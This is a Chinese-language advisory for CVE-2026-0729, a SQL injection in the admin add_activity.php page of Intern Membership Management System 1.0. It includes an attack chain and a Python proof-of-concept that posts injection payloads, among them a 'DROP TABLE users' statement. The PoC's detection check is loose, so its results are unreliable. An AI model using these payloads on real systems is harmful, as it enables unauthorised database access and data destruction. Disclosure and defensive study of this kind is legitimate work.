CVE-2026-0729 CVSS 4.7 中危

CVE-2026-0729: Intern Membership Management System 1.0 add_activity.php SQL注入漏洞

披露日期: 2026-01-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-0729

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

code-projects Intern Membership Management System 1.0

漏洞概述

CVE-2026-0729是code-projects组织开发的Intern Membership Management System 1.0中的一个中等严重性SQL注入漏洞。该漏洞存在于管理后台的add_activity.php文件中，具体受影响的是Title参数。攻击者可通过构造恶意的SQL语句利用此漏洞，可能导致未授权访问数据库、敏感数据泄露、数据篡改或删除等严重后果。由于该漏洞需要高权限认证才能利用，攻击面相对受限，但在实际场景中仍具有较高的安全风险。此漏洞已于2026年1月8日披露， exploits已公开。

技术细节

该漏洞属于典型的SQL注入错误，出现在/intern/admin/add_activity.php文件处理Title参数时。攻击者通过在Title参数中注入恶意SQL语句，可以绕过输入验证并执行任意SQL命令。漏洞产生的根本原因是程序未对用户输入进行充分的参数化查询或输入过滤，直接将用户可控的数据拼接到SQL查询语句中。成功利用此漏洞需要攻击者具有管理后台访问权限（高权限要求），可以通过HTTP请求向目标服务器发送特制的Payload。CVSS 3.1评分4.7反映出该漏洞在机密性、完整性和可用性方面均有低至中等程度的影响。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标系统，确认目标运行Intern Membership Management System 1.0，并定位管理后台入口

STEP 2

步骤2: 认证获取

攻击者通过合法途径或社会工程学获取管理后台的有效登录凭证（该漏洞需要高权限账户）

STEP 3

步骤3: 构造恶意Payload

在Title参数中构造SQL注入Payload，如使用UNION SELECT、布尔盲注或时间盲注等技术

STEP 4

步骤4: 发送攻击请求

使用认证后的Session向/intern/admin/add_activity.php发送包含恶意SQL的HTTP POST请求

STEP 5

步骤5: 数据提取或利用

根据响应或时间延迟特征，提取数据库中的敏感信息或执行进一步的攻击操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-0729 SQL Injection PoC
# Target: Intern Membership Management System 1.0
# Vulnerable File: /intern/admin/add_activity.php
# Vulnerable Parameter: Title

target_url = "http://target.com/intern/admin/add_activity.php"

# SQL Injection Payloads
payloads = [
    "test' OR '1'='1",
    "test' UNION SELECT NULL--",
    "test' AND SLEEP(5)--",
    "test'; DROP TABLE users--"
]

headers = {
    "User-Agent": "Mozilla/5.0",
    "Cookie": "PHPSESSID=admin_session_id"  # Requires authenticated session
}

def test_sqli():
    print("[*] Testing CVE-2026-0729 SQL Injection")
    print(f"[*] Target: {target_url}")
    
    for payload in payloads:
        data = {
            "Title": payload,
            "Description": "test",
            "Date": "2026-01-01"
        }
        
        try:
            response = requests.post(target_url, data=data, headers=headers, timeout=10)
            print(f"[+] Payload: {payload}")
            print(f"[+] Status: {response.status_code}")
            
            if "error" not in response.text.lower() or response.status_code == 200:
                print("[!] Potential vulnerability detected")
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    test_sqli()

影响范围

Intern Membership Management System 1.0

防御指南

临时缓解措施

立即限制管理后台访问权限，仅允许受信任的IP地址访问。同时对add_activity.php文件实施临时访问控制，直到完成安全更新。建议使用WAF规则临时拦截可疑的SQL注入特征字符串，定期监控数据库访问日志以发现异常查询行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表